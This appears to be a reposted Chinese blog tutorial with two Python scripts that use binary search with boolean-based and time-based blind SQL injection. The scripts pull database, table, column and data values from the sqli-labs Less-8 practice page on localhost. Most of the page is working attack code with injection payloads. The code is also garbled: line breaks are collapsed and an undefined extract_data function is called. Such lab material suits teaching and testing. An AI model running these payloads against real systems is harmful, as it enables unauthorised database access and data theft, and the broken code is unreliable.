当前位置: 首页 > news >正文

利用二分法+布尔盲注、时间盲注进行sql注入

news 2025/8/21 13:08:00

一、布尔盲注:

import requestsdef binary_search_character(url, query, index, low=32, high=127):while low < high:mid = (low + high + 1) // 2payload = f"1' AND ASCII(SUBSTRING(({query}),{index},1)) >= {mid} -- "res = {"id": payload}r = requests.get(url, params=res)if "You are in.........." in r.text:low = midelse:high = mid - 1return chr(low) if low > 32 else ''if __name__ == '__main__':url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'database_name = extract_data(url, "SELECT database()")print(f"数据库名: {database_name}")table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"table_names = extract_data(url, table_name_query)print(f"表名: {table_names}")table_name = table_names.split(',')[0]column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"column_names = extract_data(url, column_name_query)print(f"列名: {column_names}")column_name = column_names.split(',')[1]data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"extracted_values = extract_data(url, data_query)print(f"数据: {extracted_values}")print(f"数据库名: {database_name}")print(f"表名: {table_names}")print(f"列名: {column_names}")print(f"数据: {extracted_values}")

二、时间盲注:

import requests
import timedef binary_search_character(url, query, index, low=32, high=127):while low < high:mid = (low + high + 1) // 2payload = f"1' AND IF(ASCII(SUBSTRING(({query}),{index},1)) >= {mid}, SLEEP(2), 0) -- "res = {"id": payload}start_time = time.time()r = requests.get(url, params=res)response_time = time.time() - start_timeif response_time > 1.5:  # 服务器延迟意味着条件成立low = midelse:high = mid - 1return chr(low) if low > 32 else ''if __name__ == '__main__':url = 'http://127.0.0.1/sqlilabs/Less-8/index.php'database_name = extract_data(url, "SELECT database()")print(f"数据库名: {database_name}")table_name_query = f"SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='{database_name}'"table_names = extract_data(url, table_name_query)print(f"表名: {table_names}")table_name = table_names.split(',')[0]column_name_query = f"SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database_name}'"column_names = extract_data(url, column_name_query)print(f"列名: {column_names}")column_name = column_names.split(',')[1]data_query = f"SELECT GROUP_CONCAT({column_name}) FROM {database_name}.{table_name}"extracted_values = extract_data(url, data_query)print(f"数据: {extracted_values}")

http://www.lryc.cn/news/538682.html

相关文章:

  • Vue 项目登录的基本流程
  • kubernetes源码分析 kubelet
  • Web3 开发者周刊 36 | 构建自主未来:Agent、可扩展性与赏金
  • 零基础入门机器学习 -- 第十一章机器学习模型的评估与优化
  • 菜鸟之路Day15一一IO流(一)
  • 动手学Agent——Day2
  • JSONObject,TreeUtil,EagelMap,BeanUtil使用
  • Unity嵌入到Winform
  • TCP/UDP协议与OSI七层模型的关系解析| HTTPS与HTTP安全性深度思考》
  • 《Zookeeper 分布式过程协同技术详解》读书笔记-2
  • 缺陷检测之图片标注工具--labme
  • 机器学习_13 决策树知识总结
  • 请解释一下Standford Alpaca格式、sharegpt数据格式-------deepseek问答记录
  • ubuntu 安装管理多版本python3 相关问题解决
  • 滑动窗口算法篇:连续子区间与子串问题
  • Python爬虫实战:股票分时数据抓取与存储 (1)
  • 【设计模式】【行为型模式】访问者模式(Visitor)
  • 基于实例详解pytest钩子pytest_generate_tests动态生成测试的全过程
  • Copilot基于企业PPT模板生成演示文稿
  • 2025百度快排技术分析:模拟点击与发包算法的背后原理
  • 七星棋牌全开源修复版源码解析:6端兼容,200种玩法全面支持
  • 解锁原型模式:Java 中的高效对象创建之道
  • DeepSeek从入门到精通:揭秘 AI 提示语设计误区与 AI 幻觉(新手避坑指南)
  • Jenkins同一个项目不同分支指定不同JAVA环境
  • 从入门到精通:Postman 实用指南
  • win32汇编环境,对话框中使用月历控件示例二
  • gsoap实现webservice服务
  • 容联云联络中心AICC:深度整合DeepSeek,业务验证结果公开
  • 腿足机器人之七- 逆运动学
  • 快速点位排查问题的方法